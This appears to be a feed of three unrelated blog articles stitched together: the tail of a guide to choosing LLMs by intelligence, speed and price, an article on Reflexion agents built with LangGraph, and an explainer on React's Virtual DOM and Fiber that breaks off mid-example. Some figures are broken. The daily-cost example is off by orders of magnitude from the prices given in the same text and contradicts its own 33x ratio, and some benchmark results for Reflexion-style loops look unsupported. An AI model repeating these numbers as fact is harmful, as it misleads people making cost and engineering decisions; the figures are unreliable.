This chart is the most actionable view on ArtificialAnalysis.ai. It answers a specific question: are you paying more than you need to for the intelligence level your task actually requires?

How to read the four quadrants:

Top-left (green): High intelligence, low cost. Use here when you can.
Top-right: High intelligence, high cost. Justified only when accuracy is mission-critical.
Bottom-left: Low intelligence, low cost. Good for simple, high-volume, automated tasks.
Bottom-right: Low intelligence, high cost. Avoid.

What the data shows for specific models:

Gemini 3.1 Pro Preview scores 57 (tied for first) at a moderate cost per token, placing it near the green zone among frontier models. DeepSeek V3.2 scores around 41 at very low cost, making a strong case for cost-sensitive deployments where you do not need frontier accuracy. Claude Opus 4.7 and GPT-5.4 score at the top but sit far to the right of the cost axis. Those models are best reserved for tasks where getting the answer right is non-negotiable.

Practical decision rule: if a human reviews every AI output (legal drafting, medical notes, financial analysis), use a top-right model. If the task is automated and high-volume (content tagging, email routing, classification), use the green zone.

Pros and cons of top models across all three dimensions:

Model	Intelligence	Speed (tok/s)	Price ($/1M tok)	Best for	Avoid for
Claude Opus 4.7	57	32	$10	Complex reasoning, research	High-volume automation
Gemini 3.1 Pro Preview	57	185	$1.7	Balanced performance and speed	Ultra-low budget
GPT-5.4 (xhigh)	57	43	$4.5	Coding, tool use	Budget-constrained
DeepSeek V3.2	41	n/a	$0.4	Cost-sensitive deployments	Frontier-accuracy tasks
Gemini 3 Flash	45	160	$0.3	Speed at low cost	Deep reasoning tasks
Claude Haiku 4.5	36	n/a	~$0.25	Real-time lightweight tasks	Scientific or academic work

5. Speed: When It Changes the Product

The speed chart shows output tokens per second across leading models. gpt-oss-120B leads at 217 tokens per second. Grok 4.20 follows at 185. Gemini 3 Flash sits at 160. Claude Opus 4.7 generates 32 tokens per second, which is adequate for interactive use but not for real-time streaming at scale.

Speed matters in specific situations:

Real-time chat interfaces: users notice latency above roughly one second. At 32 tokens per second, a 500-token response takes about 15 seconds.
Streaming data pipelines: workflows that feed model output into downstream systems need throughput, not accuracy alone.
Voice AI: text-to-speech pipelines need token generation to outpace speech synthesis, typically requiring 100 or more tokens per second.

Example: A customer support chatbot handling 10,000 conversations per day with Claude Opus 4.7 (32 tok/s) vs Gemini 3.1 Pro Preview (185 tok/s) would see a 5.8x difference in throughput capacity. That means roughly 6x more compute infrastructure for the same load with the slower model.

Counter-view worth noting: for batch processing tasks such as overnight report generation or document indexing, speed is nearly irrelevant. Choosing a faster, more expensive model for those use cases adds cost without adding value.

Warning: Speed benchmarks are measured under standard conditions. Real-world throughput varies with prompt length, provider infrastructure load, and response length. Test under your actual usage pattern before making infrastructure decisions.

6. Price: What the Range Actually Means

Background: LLM APIs charge per token, roughly 0.75 words per token. Prices are quoted per one million tokens, which equals approximately 750,000 words or around 1,500 pages of text. Input tokens (your prompt) and output tokens (the model's response) are often priced separately.

The price range across leading models spans two orders of magnitude:

Cheapest: Gemini 3 Flash, gpt-oss-120B, DeepSeek V3.2 at around $0.30 to $0.40 per million tokens.
Most expensive: Claude Opus 4.7 (max) at $10 per million tokens, which is 33x more expensive than Gemini 3 Flash.

The price gap reflects model size, computational requirements, and market positioning. It is not arbitrary, but it is also not always justified for your use case.

The question is not what is cheapest. It is: what is the minimum intelligence level your task actually requires?

A framework for matching price to task:

PhD-level domain expertise or multi-document synthesis: use top-tier models ($4 to $10 per million tokens)
Code generation, complex analysis, long-form writing: use mid-tier models ($1 to $4 per million tokens)
Summarization, classification, Q&A on known content: use budget-tier models ($0.30 to $1 per million tokens)
Simple extraction, formatting, or routing: use the smallest model available

Example: A SaaS company processing 50 million tokens per day would pay $500 per day with Gemini 3 Flash vs $500,000 per day with Claude Opus 4.7. For content tagging, that $499,500 daily difference is not justified. For rare, high-stakes legal document review, the cost per decision might be entirely reasonable.

7. How AI Intelligence Has Grown Over Time

This chart tracks Intelligence Index scores for 15 leading model creators from November 2022 through May 2026. Every line moves upward. In November 2022, the best models scored around 9 to 13. By April 2026, the frontier sits at 57. That is roughly a 5x improvement in 3.5 years.

Key observations from the timeline:

November 2022: OpenAI leads with scores around 9 to 13. All other providers cluster below 10.
Late 2023: Acceleration begins. Google, Anthropic, and Meta start closing the gap.
2024 to 2025: Chinese labs including Alibaba (Qwen), Xiaomi, and DeepSeek emerge as credible competitors. The frontier cluster expands to five or six companies within a few points of each other.
Early 2026: Anthropic, Google, and OpenAI all reach 57 and are statistically tied.

The practical implication: the model you choose today will likely be mid-tier within 12 months. If you build your system in a way that couples it tightly to a specific model, you will pay a higher upgrade cost later. Where possible, build model-agnostic systems.

Counter-view: rapid improvement also means your existing production system, even one built on a 2024 model, may still perform well for your specific task. Do not upgrade because newer models exist. Upgrade when your current model's limitations affect your outcomes in measurable ways.

8. Image Generation: A Separate Evaluation Entirely

The image above shows the Text-to-Image leaderboard, which uses ELO scores based on blind preference voting. GPT Image 1.5 leads at 1,273, followed by Google's Nano Banana 2 at 1,265 and Nano Banana Pro at 1,214.

Background: ELO scoring was originally designed for chess rankings. In this context, each model "wins" or "loses" based on human preference comparisons in blind side-by-side tests. A higher ELO means more wins against other models.

For image generation tasks, the language intelligence rankings above are irrelevant. These are fundamentally different model architectures.

Current top text-to-image rankings:

Rank	Model	ELO Score	Provider
1	GPT Image 1.5 (high)	1,273	OpenAI
2	Nano Banana 2 (Gemini 3.1 Flash Image Preview)	1,265	Google
3	Nano Banana Pro (Gemini 3 Pro Image)	1,214	Google
4	FLUX.2 (max)	1,205	Black Forest Labs
5	Seedream 4.0	1,202	ByteDance
6	grok-imagine-image	1,184	xAI

Claude Opus 4.7 does not appear on this leaderboard at all. Strong language intelligence does not transfer to image quality.

Example: A marketing team using AI for visual content should look at GPT Image 1.5 or Google's Gemini image models, not at the text intelligence rankings.

Warning: ELO scores reflect general aesthetic preference in blind tests. For domain-specific image tasks such as product photography, medical imaging, or architectural visualization, run your own evaluation. General ELO rankings do not reliably predict domain-specific performance.

9. Intelligence Breakdown: Where the Real Selection Happens

This panel shows per-benchmark performance across all tracked models. The six sub-charts cover GDPval-AA, Terminal-Bench Hard, tau-squared Bench Telecom, AA-LCR, AA-Omniscience Accuracy, and AA-Omniscience Non-Hallucination Rate. Each chart shows a different ranking order, which confirms that no single model leads across every dimension.

The composite intelligence score hides important variation. Here is what each sub-benchmark tells you, and when to weight it:

Sub-Benchmark	What It Tests	Weight This For
GDPval-AA	General deep reasoning (top score: 63%)	Research, analysis
Terminal-Bench Hard	Complex system and terminal tasks (top: 58%)	DevOps, SRE tooling
Tau-Bench Telecom	Telecom domain knowledge (top: 98%)	Telecom industry AI
AA-LCR	Long-context retrieval accuracy (top: 74%)	Document Q&A, RAG systems
AA-Omniscience Accuracy	Breadth of factual knowledge (top: 55%)	General knowledge bases
AA-Omniscience Non-Hallucination	Rate of refusing to fabricate (top: 83%)	Fact-sensitive customer-facing tasks

Background: RAG stands for Retrieval-Augmented Generation. It is a technique where the model retrieves relevant documents before generating a response, used commonly in enterprise search and document Q&A products.

Example: A healthcare company building a medical information chatbot should weight the Non-Hallucination Rate above every other metric. A model that generates false medical information with confidence is worse than no model at all. The AA-Omniscience Non-Hallucination chart, where Grok 4.20 0309 v2 scores 83%, is directly relevant for that selection.

Counter-view: high non-hallucination rates sometimes correlate with more frequent "I don't know" responses. For internal R&D tools where missing information is a bigger problem than fabricating it, a slightly lower non-hallucination score with higher overall accuracy may be the right trade.

10. A Decision Framework for Picking Your Model

Bring together everything above into a repeatable process:

Step 1: Define your task type.

Text generation or reasoning: go to Step 2.
Image or video generation: use the Image Leaderboard. Start with GPT Image 1.5 or Gemini image models.
Code generation: prioritize LiveCodeBench scores over composite intelligence scores.

Step 2: Identify your primary constraint.

Accuracy is critical (medical, legal, research): look at models scoring 50 or above.
Cost is the bottleneck (high-volume automated tasks): look at DeepSeek V3.2, Gemini 3 Flash, and similar budget-quadrant models.
Speed is critical (real-time applications, voice AI): look at the Speed leaderboard. gpt-oss-120B and Grok 4.20 lead here.

Step 3: Use the Intelligence vs. Cost scatter plot.
Find models in or near the Most Attractive Quadrant that meet your minimum intelligence threshold.

Step 4: Check the sub-benchmarks relevant to your domain.

Long documents: AA-LCR
Factual accuracy in customer-facing contexts: Non-Hallucination Rate
Scientific or technical depth: GDPval-AA and GPQA
Coding: LiveCodeBench
Math or multi-step reasoning: AIME and MuSR

Step 5: Run your own evaluation.
Test on 50 to 100 examples from your actual use case before committing. Benchmark scores are population-level averages. Your specific prompts, domain vocabulary, and output format requirements will produce results that differ from benchmark rankings.

Warning: Treat benchmarks as a shortlist filter, not a final answer. The gap between benchmark rank and performance on your specific task can be substantial.

The Practical Summary

The data from ArtificialAnalysis.ai makes several things clear.

The frontier is genuinely competitive. Claude Opus 4.7, Gemini 3.1 Pro Preview, and GPT-5.4 are all tied at 57. You are not leaving significant intelligence on the table by choosing any of them. Your decision should come down to cost, speed, and the specific sub-benchmarks that matter for your task.

The price range is enormous. Gemini 3 Flash costs $0.30 per million tokens. Claude Opus 4.7 costs $10. For most automated tasks, the cheaper model is the correct choice.

Image generation is a separate decision tree entirely. Do not use text intelligence rankings to choose an image model.

Model capability is improving fast. The best model today may be mid-tier in 12 months. Build systems that are easy to upgrade.

Benchmarks are filters, not answers. Use them to narrow your options, then test on your actual task before deciding.

Data sourced from ArtificialAnalysis.ai, an independent AI evaluation platform. Rankings reflect data as of April 2026.

From Simple LLMs to Reliable AI Systems: Building Reflexion, Based Agents with LangGraph

Shafiq Ur Rehman — Sun, 19 Apr 2026 12:44:55 +0000

"An LLM that cannot reflect on its mistakes is not an agent, it is an autocomplete on steroids."
— Common wisdom in modern AI engineering

Introduction: Why "Just Prompting" Is No Longer Enough

You have seen this happen. You give an LLM a hard task. It writes a report. It fixes code. It plans something step by step. The answer sounds right. But small things are wrong. Sometimes big things are wrong.

The model does not stop to check itself. It does not ask if it made a mistake. It does not try again in a better way.

This is the gap between a simple LLM call and a system you can trust.

This article shows how to close that gap. You will learn two ideas: Reflexion, where the AI checks its own work and tries again, and LangGraph, a tool to build workflows with memory and clear steps.

Section 1: The Reliability Problem with Bare LLMs

Large language models are extraordinarily powerful pattern completers. Given a well-formed prompt, they can write poetry, generate code, summarize documents, and reason through logic puzzles. But they have a structural weakness that every practitioner eventually hits:

They do not know when they are wrong.

The Core Failure Modes

Hallucination (making up information that sounds plausible but is factually incorrect): An LLM asked to cite sources may invent URLs, author names, or statistics that feel authoritative but do not exist.
Premature convergence: The model "settles" on its first reasonable-sounding answer without exploring whether a better one exists. This is especially damaging in multi-step reasoning tasks.
Context blindness at scale: As tasks grow spanning multiple documents, steps, or tool calls, the model loses track of earlier constraints, leading to contradictions deep in a workflow.
Silent failure: Unlike a software crash, a wrong LLM output looks identical to a correct one. There is no error message. The system "succeeds" by returning something.

Counter-view: Some researchers argue that sufficiently large models with good prompting (chain-of-thought, self-consistency) can sidestep many reliability issues. This is partially true for isolated reasoning tasks, but it breaks down when tasks are long-horizon, multi-step, or require external tool use, where real-world feedback is necessary.

Real-World Case: The Air Canada Chatbot Incident (2024)

Air Canada deployed an LLM-powered chatbot that confidently told a customer they could apply for a bereavement fare after their trip and receive a refund retroactively, which was false. The chatbot hallucinated a policy that did not exist. Air Canada was held legally liable. The system had no feedback loop, no validation layer, and no ability to catch its own mistakes.

This is not a prompt engineering failure. It is an architectural failure.

📖 Further Reading: [Search: "Reliability of LLMs in production systems 2024"]

📌 Background: What Is a "Forward Pass"?

When you send a prompt to an LLM, it runs a single forward pass, meaning it reads your input from left to right through billions of parameters and generates tokens one by one until it stops. There is no internal loop, no checking, no going back. It is a one-way function. This is why LLMs cannot self-correct without external scaffolding.

Section 2: Enter Reflexion: Teaching AI to Think Twice

Reflexion is a framework introduced in a 2023 research paper by Shinn et al. at Northeastern University. The core idea is elegant:

Instead of training a model to be better (which requires compute and data), give it the ability to reflect on its own failures in natural language, store that reflection as memory, and try again.

This is significant because it requires no weight updates, no fine-tuning, no retraining. It is a pure inference-time technique that turns a static model into a self-improving agent.

The Three Components of Reflexion

Actor The LLM that actually does the task. It takes the current task description + any memory from past attempts and generates an output (text, code, a plan, a tool call, etc.).
Evaluator (also called the "Critic") A scoring function that judges the Actor's output. This can be:
- Another LLM call that critiques the output
- A deterministic function (e.g., unit test pass/fail, a factuality checker, a code linter)
- A human-in-the-loop signal
Reflector The component that reads the Actor's output and the Evaluator's feedback, then produces a verbal self-critique, a natural language paragraph explaining what went wrong and how to do better. This critique is stored in a persistent episodic memory and injected into the Actor's next attempt.

Why Verbal Reflection Works

The brilliant insight is that LLMs are good at talking about their mistakes even when they make them. By externalizing the critique into language (rather than gradient updates), you leverage the very skill LLMs are best at. "I failed because I did not account for edge case X. Next time, I should check for X first." This verbalized lesson, fed back into the context window, measurably improves next-attempt quality.

Counter-view: Critics point out that Reflexion can get "stuck" if the Actor's initial attempt is wrong in a way the Evaluator cannot detect, the reflection loop simply reinforces the error. The quality of the Evaluator is the ceiling of the entire system. A bad judge produces bad feedback.

Example: HotpotQA Multi-Hop Reasoning

In the original Reflexion paper, the technique was benchmarked on HotpotQA, a dataset of questions requiring reasoning across multiple Wikipedia articles. A plain GPT-4 agent answered correctly ~30% of the time on hard questions. The same model with Reflexion reached ~60% accuracy after three reflection cycles, without any fine-tuning. The improvement came purely from the agent saying: "I missed that the question asked about the founding date, not the founding country. Let me re-read the passage with that in mind."

📖 Further Reading: [Search: "Reflexion: Language Agents with Verbal Reinforcement Learning Shinn et al. 2023"]

⚠️ CRITICAL NOTE: Token Budget and Cost

Every reflection cycle is an additional LLM call. On a 3-cycle Reflexion loop with a GPT-4-class model, you are paying for 3–6× the tokens of a single call. For high-volume production systems, this cost must be budgeted explicitly. Always add a max_iterations guard and use cheaper models for the Evaluator when possible.

Section 3: LangGraph, Stateful Agents as Executable Graphs

LangGraph is a library built on top of LangChain that lets you define agent workflows as directed graphs where nodes are functions (or LLM calls) and edges are transitions between them, which can be conditional.

This is a fundamentally better model for complex agents than a simple chain or a while-loop in Python, for three reasons:

Why Graphs Beat Chains for Agents

Explicit state management: LangGraph makes the agent's "working memory" what it knows, what it has tried, what it is doing into a typed, inspectable Python object called the State. You always know what data is flowing through your system.
Conditional branching: Edges in LangGraph can be conditional. After the evaluator runs, you can route: "If score is good enough → END; else → reflect_node." This is the architectural backbone of the retry loop.
Built-in persistence: LangGraph supports checkpointing, saving the agent's state to a database between steps. This means long-running agents can be paused, resumed, debugged, or even handed off to a human mid-execution.

Counter-view: Some engineers prefer simpler approaches, a while-loop in Python with direct API calls, arguing that LangGraph adds abstraction overhead. This is valid for simple use cases. The graph model truly pays off when you have branching logic, human-in-the-loop steps, or parallel sub-agents that need to join results.

Example: LangGraph vs. LangChain Sequential Chain

Imagine an agent that writes code, runs it, and fixes errors.

With a LangChain sequential chain, you predefine the steps: write → run → fix → done. But what if it needs 3 fix cycles? Or what if the code is correct on the first try? The chain cannot dynamically decide.

With LangGraph, you define: write_node → run_node → conditional_edge(pass? → END, fail? → fix_node) → run_node. The graph routes itself based on runtime results. This is the difference between a flowchart and a script.

📖 Further Reading: [Search: "LangGraph documentation stateful agents 2024"]

📌 Key Term: Conditional Edges

In LangGraph, a conditional edge is a function that inspects the current State and returns the name of the next node to visit. This is how you implement decision logic: "if the evaluator score is above 0.8, go to END; otherwise, go to reflect_node." Without conditional edges, you have a chain, not an agent.

Section 4: Architecting the Reflexion Agent Design Deep Dive

Now we get into the engineering. A Reflexion agent in LangGraph is built around three decisions that determine everything else: what the state looks like, what each node does, and how the conditional router decides when to stop.

4.1 Designing the State

The State is the agent's "working memory." Every node reads from it and writes to it. A well-designed State captures:

The task is immutable, set at the start
All past attempts so the Actor can see what it has already tried
All past reflections so the Actor has accumulated lessons
Scores per attempt for the router to decide stop/continue
Iteration counter is the safety valve against infinite loops
Final answer populated when done

A common mistake is storing only the latest attempt and reflection, discarding history. This strips the agent of its learning advantage. The whole point is that accumulated reflections compound across cycles.

4.2 The Actor Node

The Actor prompt is the most important in the system. It should include:

def actor_node(state: ReflexionState) -> ReflexionState:
    # Build context from accumulated memory
    memory_context = ""
    for i, (attempt, reflection) in enumerate(
        zip(state["attempts"], state["reflections"])
    ):
        memory_context += f"\n\n--- Attempt {i+1} ---\n{attempt}"
        memory_context += f"\n--- Self-Critique {i+1} ---\n{reflection}"

    prompt = f"""
    Task: {state['task']}

    {f"Your previous attempts and self-critiques:{memory_context}" if memory_context else "This is your first attempt."}

    Now produce your best answer, learning from any past mistakes.
    """
    response = llm.invoke(prompt)
    return {
        **state,
        "attempts": state["attempts"] + [response.content],
        "iteration": state["iteration"] + 1,
    }

Notice how the full history of attempts and reflections is injected. This is episodic memory, the agent is literally given its autobiography.

4.3 The Evaluator Node

This is the most context-dependent part. The right evaluator depends entirely on your task:

Task Type	Best Evaluator
Code generation	Unit test runner (deterministic)
Factual Q&A	Another LLM with a fact-check prompt
Essay writing	Rubric-based LLM judge
API calls	HTTP response status + schema validation
Math	Python `eval()` or symbolic solver

A deterministic evaluator (like running tests) is always preferable when available, because it is objective and cheap. LLM-as-judge is useful but introduces its own biases.

4.4 The Reflector Node

def reflect_node(state: ReflexionState) -> ReflexionState:
    last_attempt = state["attempts"][-1]
    last_score = state["scores"][-1]

    prompt = f"""
    You attempted this task: {state['task']}

    Your output was:
    {last_attempt}

    The evaluator gave it a score of {last_score:.2f} out of 1.0.

    Write a concise, specific self-critique (3–5 sentences):
    - What specifically went wrong?
    - What did you overlook or misunderstand?
    - What concrete change will you make next time?

    Do not be vague. Be precise and actionable.
    """
    reflection = llm.invoke(prompt).content
    return {**state, "reflections": state["reflections"] + [reflection]}

The prompt instructs the LLM to be specific and actionable, not vague. "I should do better" is useless. "I failed to handle the case where the input list is empty, causing an IndexError. Next time, I will add a guard clause at line 1." is useful.

4.5 The Conditional Router

def should_continue(state: ReflexionState) -> str:
    if not state["scores"]:
        return "actor"  # First iteration, no score yet

    last_score = state["scores"][-1]
    iteration = state["iteration"]

    if last_score >= 0.85:
        return END  # Good enough
    if iteration >= state["max_iterations"]:
        return END  # Safety stop
    return "reflect"  # Not done yet, reflect and retry

The threshold (0.85 here) is a hyperparameter (a design-time setting that you tune rather than the model learns) that you tune per domain. For medical or legal agents, set it close to 1.0. For creative writing suggestions, 0.7 may suffice.

Example (Real-World Case): Reflexion for Competitive Programming

DeepMind's AlphaCode 2 and similar code-agent research use Reflexion-like loops where the actor writes code, a test suite evaluates it, and failure messages are reflected into the next attempt. On LeetCode Hard problems, this pattern lifted solve rates from ~15% (single pass) to ~45% (5 reflection cycles) in published ablations. The key: tests provided a perfect, deterministic evaluator with no LLM-as-judge ambiguity.

📖 Further Reading: [Search: "LangGraph Reflexion agent code tutorial LangChain 2024"]

⚠️ WARNING: Reflection Can Degrade Quality

There is a known failure mode called "reflection poisoning" where a poor reflection actually steers the actor away from a correct answer it found. If your evaluator has a bug or blind spot, a correct output might be scored low, causing the reflector to critique something that was actually right. Always log and inspect all intermediate states, especially on tasks where correctness is hard to verify.

Section 5: Pros, Cons, and When to Use This Pattern

Reflexion + LangGraph: Honest Trade-offs

	Pros	Cons
Quality	Measurably higher accuracy on complex tasks	Quality ceiling is set by the evaluator's accuracy
Cost	No fine-tuning needed; inference-only	Multiple LLM calls per task; 3–10× base cost
Flexibility	Works with any LLM; swappable components	Adds significant engineering complexity vs. one-shot
Debuggability	State is fully inspectable at every step	More surface area for bugs; harder to trace failures
Latency	Best answer given time budget	Latency scales with iterations; not for real-time apps
Reliability	Handles task types that single-pass fails at	Can loop indefinitely without a hard iteration cap

When TO Use Reflexion-Based Agents

Tasks where errors are catchable and measurable (code, math, structured outputs)
Workflows where cost of a wrong answer exceeds the cost of extra API calls (legal, medical, financial drafting)
Asynchronous or batch tasks where latency is not the primary constraint
Tasks involving tool use where real-world feedback naturally forms the evaluation signal

When NOT To Use

Real-time, low-latency applications (chatbots with <2s response requirement)
Tasks where the evaluator itself would need to be an expensive LLM call, the economics may not hold
Simple, well-scoped tasks where a single well-crafted prompt already performs well
Domains where you cannot define a reliable evaluation metric at all

Counter-view: With inference costs falling ~50% every 12–18 months historically, the cost argument against multi-cycle agents is weakening. By 2026 standards, what costs $0.10 per task today may cost $0.01. Cost-based objections have a short half-life.

Example: When NOT to Use It: The Customer Service Case

A retail company tested Reflexion for their live chat customer support bot. The latency of 3 reflection cycles (avg. 12 seconds per loop) made conversations feel broken. Customers expected responses in 2–3 seconds. The agent was technically more accurate, but user satisfaction scores dropped because of perceived slowness. Architecture must match use-case constraints, not just quality targets.

📖 Further Reading: [Search: "LLM agent latency optimization production 2024"]

Section 6: Production Hardening What Research Papers Don't Tell You

Research papers show the happy path. Production systems face messier realities. Here is what you must address:

Critical Production Concerns

Context window overflow: By iteration 3, the state contains the original task + 3 attempts + 3 reflections. On long tasks, this can exceed the model's context window (the maximum text length a model can process at once). Implement a compression step that summarizes older reflections into a brief "lessons learned" paragraph.
Checkpointing for resilience: LangGraph's SqliteSaver and RedisSaver let you persist state between steps. If your agent is doing a 10-step task and fails at step 8, you can resume from step 8 without rerunning the first 7 steps. This is non-negotiable for long-running agents.
Observability: Use LangSmith (or equivalent tracing tools) to visualize every node's inputs and outputs in real time. Reflexion agents that fail silently are far harder to debug than a simple chain, because the error may be in the evaluator logic, the reflection prompt, or the routing condition.
Human-in-the-loop escalation: If after max_iterations the agent has not reached a satisfactory score, route to a human review queue instead of silently returning the best-so-far. This is the most important reliability upgrade for production.

Example: The GitHub Copilot Workspace Model

GitHub Copilot Workspace (released 2024) uses a multi-step agentic loop that resembles Reflexion: it generates a plan, the user can review/edit it (human evaluator), then it generates code, runs tests, and iterates on failures. The "human-as-evaluator" in the planning step is a deliberate design choice that combines automated iteration with human judgment the best of both worlds.

📖 Further Reading: [Search: "GitHub Copilot Workspace agent architecture 2024"]

⚠️ SECURITY NOTE: Prompt Injection in Agentic Loops

When the agent's tool outputs (e.g., web search results, code execution stdout) are fed back into the prompt, malicious content in those results can hijack the agent's behavior. This is called prompt injection. Always sanitize tool outputs before injecting them into prompts, and consider running evaluators and reflectors on a separate, sandboxed model invocation.

Section 7: The Bigger Picture Where Reflexion Fits in the AI Stack

Reflexion is one pattern in a growing taxonomy of agent architectures. Understanding where it sits helps you choose the right tool:

Agent Architecture Taxonomy

Single-pass LLM One prompt, one response. Fast. No self-correction.
Chain-of-thought (prompting the model to "think step by step" before answering) Better reasoning, but still single-pass.
ReAct (Reasoning + Acting: the model alternates between thinking and calling tools) Good for tool use, but no explicit self-correction loop.
Reflexion Adds a verbal self-correction cycle on top of any base agent pattern.
Multi-agent systems Multiple specialized agents (planner, executor, critic), each running independently, coordinated by an orchestrator. Reflexion can live inside each agent.
RLHF / fine-tuning (Reinforcement Learning from Human Feedback training the model's weights to be better using human preferences) Bakes improvements into the model permanently, but requires data and compute. Reflexion is the inference-time alternative.

Reflexion sits at a sweet spot: more reliable than ReAct, cheaper than fine-tuning, easier to implement than multi-agent systems. It is the right starting point when single-pass quality is insufficient, but you cannot yet justify the infrastructure cost of a full multi-agent system.

Counter-view: Some teams argue that investing engineering time in Reflexion scaffolding would be better spent curating fine-tuning data. For domain-specific, high-volume tasks, a fine-tuned small model often outperforms a Reflexion-looped large model at a fraction of the cost. This is a genuine trade-off worth modeling quantitatively before committing.

Example: Cognition AI's Devin (2024)

Devin, marketed as the first "AI software engineer," uses a multi-step loop where the agent writes code, runs it in a sandboxed terminal, observes the output (evaluator), and iterates on failures. A Reflexion-like architecture at its core. The real innovation was the deterministic evaluator: actual code execution. Devin's benchmark scores (14% on SWE-bench) became meaningful precisely because the evaluation was objective, not LLM-based.

📖 Further Reading: [Search: "Cognition AI Devin architecture evaluation 2024"]

Conclusion: The Engineering Mindset Shift

The move from simple LLMs to reliable AI systems is not about finding a better model. It is about changing your architectural mindset:

From one-shot generation to iterative refinement
From static prompts to stateful, memory-carrying agents
From hoping the model is right to building systems that verify and retry

Reflexion and LangGraph together give you the building blocks for this shift. Reflexion provides the cognitive loop, the ability to criticize and improve. LangGraph provides the execution infrastructure, typed state, conditional routing, persistence, and observability.

Neither is magic. Both require careful engineering: a well-designed evaluator, a well-tuned reflector prompt, a sensible iteration cap, and proper production hardening. But applied correctly, they transform an LLM from a clever autocomplete into a system that can be trusted with consequential tasks.

The difference between a demo and a production AI system is not the model. It is the scaffolding around it.

How React Achieves High Performance, Even With Extra Layers

Shafiq Ur Rehman — Sun, 21 Sep 2025 14:10:41 +0000

A common interview question around React is:
“If DOM updates are already costly, and React adds Virtual DOM + Reconciliation as extra steps, how can it be faster?”

Many developers, including myself at one point, confidently answer: “Because of Virtual DOM!”
But that’s not the full picture. Let’s break it down properly.

First: How Browser Rendering Works (Brief Overview)

Before we talk about React’s optimizations, let’s first understand how the browser renders things by default.

When the browser receives HTML and CSS from the server, it:

Creates the DOM tree and CSSOM tree
Combines them into the Render Tree
Decides the layout, which element goes where
Finally, paints the pixels on screen

When something changes, like text content or styles, the DOM and CSSOM are rebuilt, the Render Tree is recreated, and then comes the expensive part: Reflow and Repaint.

In this process:

Positions are recalculated
Elements are repainted wherever styles or content have changed

Both Reflow and Repaint are costly operations, and this is exactly where React tries to help.

Now, let’s move to React and the Virtual DOM.

What Is Virtual DOM?

Virtual DOM is a lightweight copy of the actual DOM, represented as a JavaScript object.

Why was it needed? What was the problem with direct DOM manipulation?

Let’s look at an example.

// Normal DOM manipulation, NOT React
setInterval(() => {
  const span = document.createElement('span');
  span.textContent = new Date().toLocaleTimeString();
  document.getElementById('root').appendChild(span);
}, 1000);

Here, only the span’s time is updating. But if you inspect in DevTools, you’ll see the entire div re-rendering.

Modern browsers are smart; if other elements existed, they wouldn’t repaint them. But even then, in this case, the browser isn’t precise enough. The entire element container is being marked for update.

Now look at the same code in React:

function App() {
  const [time, setTime] = useState(new Date().toLocaleTimeString());

  useEffect(() => {
    const interval = setInterval(() => {
      setTime(new Date().toLocaleTimeString());
    }, 1000);
    return () => clearInterval(interval);
  }, []);

  return (
    <div>
      <h3>Current Time:</h3>
      <span>{time}</span>
    </div>
  );
}

Here, only the span updates. The div doesn’t re-render. React has already optimized the process at this level.

So how does React do this?

React creates a Virtual DOM.

First, it creates the initial Virtual DOM, a JS object tree mirroring your UI.

Example:

div
├── h3
├── form
│   └── input
└── span → "10:30 AM"

When state updates, say, time changes to “10:31 AM,” React creates a new Virtual DOM tree:

div
├── h3
├── form
│   └── input
└── span → "10:31 AM"

Then React compares the old and new Virtual DOM trees. This comparison process is called Diffing.

React sees: “Only the text inside span changed.” So it updates only that span in the Real DOM, and triggers repaint for just that node.

This comparison algorithm is called the Diffing Algorithm.

Two Key Optimizations in Diffing

Batching Updates

If multiple state updates happen, React doesn’t go update the DOM each time. It batches them together and applies them in one go.

Example:

setCount(1);
setName("Alice");
setLoading(true);

React will wait, collect all three, compute a final Virtual DOM, diff it, and update the Real DOM once.

This avoids multiple reflows/repaints.

Element Type Comparison Let’s say you have a login/logout UI:

function App({ isLoggedIn }) {
  if (isLoggedIn) {
    return <h1>Welcome back, user!</h1>;
  } else {
    return <button>Log In</button>;
  }
}

Initial Virtual DOM (logged out):

div → class="app"
└── button → "Log In"

Updated Virtual DOM (logged in):

div → class="app"
└── h1 → "Welcome back, user!"

React starts comparing from the root.

div → same → check props → class="app" → same → move on
Now children: button vs h1 → TYPE MISMATCH

React doesn’t try to “update” the button into an h1. It destroys the entire subtree and recreates it from scratch.

This is efficient because trying to morph one element into another is more expensive than just replacing it.

So far, this process seems optimized. Then why did React introduce Fiber?

Why Was Fiber Needed?

The original Reconciliation process had a critical flaw: It was synchronous and recursive.

Once started, it would run to completion, blocking the main thread.

Imagine this scenario:

User is typing in an input field
Meanwhile, 10 API calls return and trigger UI updates

Because React’s diffing was synchronous, it would process all 10 updates in one blocking pass, freezing the UI while the user is typing.

React had no way to say: “This user input is high priority, do it first. Those API updates? Do them later.”

Everything was treated equally and executed in one uninterrupted stack.

This hurt user experience.

So in React 16, Fiber was introduced.

What Is React Fiber?

React Fiber is a new Reconciliation algorithm. All updates in modern React go through Fiber.

Fiber solved the core problem: It made Reconciliation interruptible, prioritizable, and asynchronous.

Let’s understand how.

Fiber Working, Step by Step

Consider this component:

function App() {
  const [name, setName] = useState("");
  const [loading, setLoading] = useState(false);

  return (
    <div className="app">
      <h2 onClick={() => {
        setName("Shafique");
        startTransition(() => {
          setLoading(true);
        });
      }}>
        Click to Update
      </h2>
      <Profile name={name} />
      <Dashboard loading={loading} />
    </div>
  );
}

Here:

setName("Shafique") → high priority update (Sync Lane)
setLoading(true) wrapped in startTransition → low priority (Transition Lane)

Fiber will handle them differently.

Fiber Architecture, Key Concepts

1. Fiber Node

Every element, component, DOM node, and text becomes a Fiber Node.

Example component tree:

<App>
  ├── <h2>
  ├── <Profile>
  └── <Dashboard>

Becomes a Fiber Tree where each node is a unit of work.

2. Current Tree vs WIP(Work-In-Progress Tree)

Current Tree → The tree currently rendered on screen
Work-In-Progress (WIP) Tree → The tree being prepared for next render

When updates happen, React builds the WIP tree and then swaps it with the Current Tree during the Commit Phase.

Fiber Reconciliation Two Phases

Phase 1: Render Phase (Interruptible)

This phase has two sub-phases:

a. Begin Work

React visits each Fiber Node starting from the root.

It checks:

Does this node need update?
What’s the new state/props?
Create/clone Fiber Node for WIP tree

b. Complete Work

After a node’s children are processed, React:

Creates the actual DOM node (if new)
Links it to the Fiber Node via stateNode
Adds the Fiber Node to the “Effect List” if it needs a DOM update

Example:

fiber.stateNode = document.createElement('h2');

The Effect List is a linked list of nodes that need DOM mutations.

Traversal Order, Depth First

Fiber doesn’t use recursion; it uses a linked list with pointers:

child → first child
sibling → next sibling
return → parent

Traversal order:

Start at Root
Go to the child
Keep going to the child until the leaf
At leaf → go to sibling
If no sibling → go back to parent
Parents’ sibling? Go there. Otherwise, go to the grandparent.

Example:

Root
└── App
    ├── h2
